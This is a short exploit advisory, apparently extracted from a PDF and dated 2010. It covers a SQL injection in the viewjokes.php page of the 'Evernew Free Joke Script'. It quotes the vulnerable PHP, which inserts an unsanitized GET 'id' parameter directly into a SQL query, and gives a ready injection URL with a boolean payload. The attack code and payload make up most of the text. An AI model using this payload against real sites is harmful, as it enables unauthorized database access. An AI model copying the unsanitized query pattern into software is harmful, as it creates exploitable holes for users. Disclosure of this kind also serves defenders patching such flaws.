Evernew Free Joke Script viewjokes.php SQL Injection.pdf

1 /* 2 3 Name : Evernew Free Joke Script (viewjokes.php) SQL Injection 4 WebSite : www.evernewscripts.com 5 6 Author : Hamza ’MizoZ’ N. 7 Email : mizozx@gmail.com 8 9 Greetz : Zuka , int_0x80 , geeksec.com ... a loot 10 11 */ 12 13 # VULN CODE ]−−[ viewjokes.php : 14 15 $id=$HTTP_GET_VARS[’id’]; 16 $title=$HTTP_GET_VARS[’title’]; 17 18 stuffViewer($id, ’jokes’); 19 20 $query="select * from jokes where id=$id"; 21 $allresults=mysql_query($query); 22 $viewjokes=mysql_fetch_array($allresults); 23 24 # EXPLOIT : 25 26 http://[THINGS ...]/viewjokes.php?id=5+and+(select 1)=1−− 27 Page 1/1 Evernew Free Joke Script viewjokes.php SQL Injection Hamza ’MizoZ’ N. 02/01/2010